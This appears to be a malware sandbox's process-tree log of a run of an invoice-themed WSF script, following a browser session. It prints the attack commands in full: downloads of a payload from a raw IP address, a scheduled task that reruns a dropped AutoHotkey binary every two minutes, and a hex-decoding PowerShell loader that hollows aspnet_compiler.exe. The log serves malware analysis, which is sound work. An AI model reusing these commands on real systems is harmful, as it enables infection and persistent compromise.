PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4928	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4928	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 196	4948	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://api.getwemail.io/redirect-to/9cdc304a-b51f-4832-90f8-ef21825e30e9:01c8ea7ad58cbd5ea4e827d806068608/8006b2393b77ce204f6a2513f4d63334?email_id=4730d583-7964-45c8-8c12-c2c79e860582
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff08cb9758,0x7fff08cb9768,0x7fff08cb9778
2⤵
PID:392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:2
2⤵
PID:4004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
2⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
2⤵
PID:196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:1
2⤵
PID:4956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:1
2⤵
PID:4668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
2⤵
PID:4196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
2⤵
PID:3220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
2⤵
PID:3540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
2⤵
PID:3296

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4960

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1864

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Modifies registry class
PID:612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:740

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
2⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
3⤵
PID:2852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3360

C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
4⤵
PID:676

C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
6⤵
PID:2604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
7⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
8⤵
PID:2636

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
1⤵
- Enumerates connected drives
- Modifies registry class
PID:4268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
2⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
3⤵
PID:2468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4144

C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
4⤵
PID:4396

C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
5⤵
PID:748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
6⤵
PID:304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
7⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
PID:2844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
8⤵
PID:2984

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
1⤵
- Enumerates connected drives
- Modifies registry class
PID:1748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
2⤵
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
2⤵
PID:3456

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
2⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
3⤵
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5092

C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
4⤵
PID:2300

C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
5⤵
PID:1376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
6⤵
PID:4960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
7⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
PID:4688

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
8⤵
PID:2532

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
1⤵
- Enumerates connected drives
- Modifies registry class
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
2⤵
PID:424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
2⤵
PID:4132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
2⤵
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
2⤵
PID:1048

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
2⤵
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
3⤵
PID:4952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('Reflection', $ta, 6, $null, $null, 3);"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1100

C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
4⤵
PID:1812

C:\Users\Public\node.exe
C:\Users\Public\node.exe C:\Users\Public\run.js
5⤵
PID:4144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
